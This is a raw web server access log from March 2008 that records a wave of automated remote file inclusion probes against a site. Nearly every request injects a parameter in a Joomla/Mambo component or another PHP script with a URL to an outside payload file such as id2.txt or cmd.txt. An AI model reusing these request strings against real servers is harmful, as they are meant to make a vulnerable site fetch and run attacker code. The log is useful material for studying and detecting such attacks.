77.245.149.70 - - [27/Mar/2008:09:04:01 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:04:52 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.8.66 - - [27/Mar/2008:09:05:10 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.126.183.119 - - [27/Mar/2008:09:05:15 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:05:19 -0700] "GET /logs/access_080312.log//?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:05:20 -0700] "GET //?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:05:20 -0700] "GET /logs//?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 200 40554 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [27/Mar/2008:09:05:21 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:09:06:05 -0700] "GET /index.php?pageurl=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:09:06:09 -0700] "GET /logs/access_080117.log//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:09:06:09 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:06:17 -0700] "GET /logs/access_080107.log//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:06:21 -0700] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:06:21 -0700] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:06:21 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [27/Mar/2008:09:06:22 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:06:23 -0700] "GET /logs/access_080107.log//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:06:46 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:06:47 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:06:47 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:06:48 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:06:48 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:06:49 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.151 - - [27/Mar/2008:09:07:17 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/bangke77/alat/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [27/Mar/2008:09:07:17 -0700] "GET /mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/bangke77/alat/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [27/Mar/2008:09:07:17 -0700] "GET /logs/mambots/content/multithumb/offlinebar.php?mosConfig_absolute_path=http://www.geocities.com/bangke77/alat/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:07:35 -0700] "GET /logs/access_080312.log//?pg=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:07:36 -0700] "GET //?pg=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:07:36 -0700] "GET /logs//?pg=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 200 40554 "-" "libwww-perl/5.805" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:07:51 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:07:53 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:09:07:54 -0700] "GET /logs/access_080215.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:07:56 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:08:36 -0700] "GET /logs/access_080312.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:09:09:08 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:09:09:10 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:09:25 -0700] "GET /logs/access_080207.log//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:09:25 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:09:25 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:09:32 -0700] "GET /logs/access_080119.log//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.87.96.4 - - [27/Mar/2008:09:10:14 -0700] "GET /logs/access_080312.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [27/Mar/2008:09:10:15 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.87.96.4 - - [27/Mar/2008:09:10:15 -0700] "GET /logs/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.8.66 - - [27/Mar/2008:09:10:52 -0700] "GET /logs/access_080117.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [27/Mar/2008:09:10:52 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [27/Mar/2008:09:10:52 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:10:57 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:11:02 -0700] "GET /logs/access_080107.log//app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:11:35 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:11:35 -0700] "GET /logs/access_080312.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:11:35 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:11:35 -0700] "GET /logs/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:11:36 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:11:38 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.98.97 - - [27/Mar/2008:09:11:38 -0700] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
86.109.98.97 - - [27/Mar/2008:09:11:38 -0700] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:11:39 -0700] "GET /logs/access_080312.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:11:39 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:11:39 -0700] "GET /logs/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.211.217 - - [27/Mar/2008:09:12:01 -0700] "GET /logs/access_080211.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:03 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:06 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:45 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:49 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:12:49 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:09:12:56 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?file=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:09:12:56 -0700] "GET /logs//skin/zero_vote/error.php?file=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [27/Mar/2008:09:13:22 -0700] "GET /logs/access_071227.log//skin/zero_vote/error.php?file=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.11 - - [27/Mar/2008:09:13:37 -0700] "GET /index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=http://www.pusanfood.com/bbs//skin/zero_vote//data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:14:01 -0700] "GET /logs/access_080312.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:14:01 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:14:01 -0700] "GET /logs/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [27/Mar/2008:09:14:12 -0700] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
222.236.47.176 - - [27/Mar/2008:09:14:12 -0700] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.53.84.2 - - [27/Mar/2008:09:14:13 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.63.128.87 - - [27/Mar/2008:09:14:42 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
66.63.128.87 - - [27/Mar/2008:09:14:43 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
66.63.128.87 - - [27/Mar/2008:09:14:43 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.66" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:09:14:48 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.90.77.25 - - [27/Mar/2008:09:14:51 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.25 - - [27/Mar/2008:09:14:52 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.25 - - [27/Mar/2008:09:14:52 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.52 - - [27/Mar/2008:09:14:54 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.52 - - [27/Mar/2008:09:14:54 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.52 - - [27/Mar/2008:09:14:54 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:14:54 -0700] "GET /logs/access_080312.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:14:54 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.105 - - [27/Mar/2008:09:14:55 -0700] "GET /logs/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:14:58 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:14:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:14:58 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.8.66 - - [27/Mar/2008:09:15:05 -0700] "GET /logs/access_080125.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://emptyhearts.net/entropybanner/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:09:15:24 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:09:15:24 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.61.101 - - [27/Mar/2008:09:15:25 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.23.229.105 - - [27/Mar/2008:09:15:26 -0700] "GET /logs/access_080119.log/index.php?option=com_newsfeeds&task=view&feedid=42&Itemid=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [27/Mar/2008:09:15:26 -0700] "GET /index.php?option=com_newsfeeds&task=view&feedid=42&Itemid=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [27/Mar/2008:09:15:27 -0700] "GET /logs/index.php?option=com_newsfeeds&task=view&feedid=42&Itemid=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.168.161.227 - - [27/Mar/2008:09:15:36 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://brotherhoodlounge.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.168.161.227 - - [27/Mar/2008:09:15:36 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://brotherhoodlounge.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.168.161.227 - - [27/Mar/2008:09:15:36 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://brotherhoodlounge.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
